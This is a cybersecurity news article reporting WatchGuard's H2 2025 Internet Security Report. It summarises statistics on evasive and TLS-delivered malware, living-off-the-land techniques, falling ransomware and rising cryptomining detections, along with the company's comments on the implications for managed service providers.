SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers
Australia
International Women’s Day
392 opinions Read now

Guides

#
cloud security
#
cybersecurity
#
endpoint protection
#
firewalls
#
ransomware

Search

Server room night encrypted code swirls malware cracked shield
#
Malware
#
Firewalls
#
Ransomware

WatchGuard warns of surge in evasive, encrypted malware

Fri, 20th Feb 2026
Author image
By Joseph Gabriel Lagonsin, News Editor

WatchGuard reported a steep rise in new and evasive malware in the second half of 2025, along with a jump in threats delivered over encrypted connections. The findings point to growing pressure on signature-based security tools.

Its H2 2025 Internet Security Report found unique endpoint malware rose more than 1,548% in the second half of the year, with a spike between the third and fourth quarters. It also found that 23% of detected malware evaded signature-based detection.

The report draws on aggregated threat intelligence from WatchGuard's network security, endpoint, and DNS filtering products. The figures reflect what many security teams see across hybrid environments, where endpoints span on-premises systems and cloud services, giving attackers more room to operate.

WatchGuard's data shows malware delivery and detection patterns shifted quickly over the period. Network-based malware detections rose 26% from the first half to the second half of 2025, while network attacks fell 28% over the same period. Unique network exploits also declined.

Encrypted traffic

One of the sharpest changes involved malware delivered over encrypted connections: evasive malware detected over TLS rose by almost 2,000%.

Encrypted delivery also accounted for most blocked threats in the telemetry. According to the report, 96% of blocked malware arrived over TLS, underscoring the challenge for organisations that do not inspect encrypted traffic at the network edge.

The report also noted a drop in zero-day malware, which fell to 23% of total detections. That matches its separate finding that 23% of malware evaded signature-based detection, which it treats as a proxy for zero-day behaviour.

Endpoint shift

The research points to a change in endpoint techniques, with Living-off-the-Land Windows binaries becoming the top endpoint malware vector in the second half of 2025.

Living-off-the-land techniques rely on tools already present in Windows environments. Attackers use legitimate processes and binaries to blend in with normal administrative activity, reducing the value of static indicators such as known malicious files.

Malicious scripts declined gradually over the past year, a shift the report links to greater use of built-in Windows tools and trusted processes as primary infection vectors.

Ransomware and mining

The findings also suggest a change in how attackers pursue revenue. Ransomware detections fell 68% in 2025, while cryptomining activity rose significantly.

The report argues the drop in ransomware volume did not ease commercial pressure from extortion. It says public extortion payments reached record levels, suggesting fewer incidents but higher-value targets.

Cryptomining remains attractive because it can generate returns once access is established, and can run for long periods if it avoids detection-especially in environments with limited visibility across endpoints and network traffic.

MSP implications

WatchGuard framed the results as a warning for managed service providers and their customers. "Today's threat landscape has outgrown point solutions and reactive security models," said Corey Nachreiner, chief security officer at WatchGuard Technologies.

"For MSPs, the business risk is especially high. Client breaches increase support costs, damage trust, and create a clear competitive disadvantage. The MSPs that will succeed in 2026 and beyond are those that can clearly demonstrate proactive threat intelligence and unified protection across their customers' environments," Nachreiner said.

WatchGuard's commentary emphasised the limits of defences that rely heavily on signatures in environments where malware changes quickly and attackers use encryption and legitimate tools. The report says attackers increased both the volume and sophistication of malware during 2025, with growth in new malware each quarter.

It also described phishing campaigns in the second half of 2025 that used malicious PowerShell scripts as a staging step for malware tools, including remote access trojans, while trying to evade automated file analysis. The report casts this as an example of attackers refining delivery methods, even as some script-based techniques declined overall.

On the network side, it found that most detections continued to target long-standing vulnerabilities, including those affecting web applications. It highlighted intrusion prevention systems and layered defences as part of the response to persistent exploitation of older weaknesses.

WatchGuard said the findings strengthen the case for continuous monitoring and a more integrated approach across endpoint and network controls, as attackers continue to rely on encryption, obfuscation, and living-off-the-land techniques.

Related stories
Tetrate unveils Built on Envoy open source extension hub
DataBahn deepens Microsoft Sentinel tie-up to cut SIEM costs
IBM warns AI & quantum threats will reshape cybercrime
Salesforce guest flaws fuel large-scale data harvesting
Jazz raises USD $61m to reinvent data loss prevention

Top stories

Anthropic to open Sydney office in Australia, New Zealand
Cisco, UTS open digital innovation hub for AI in Sydney
Critical MediaTek flaw lets attackers steal phone crypto
GTIA launches PeerTrust Circles for security-led IT peers
Open source dependencies leave apps dangerously exposed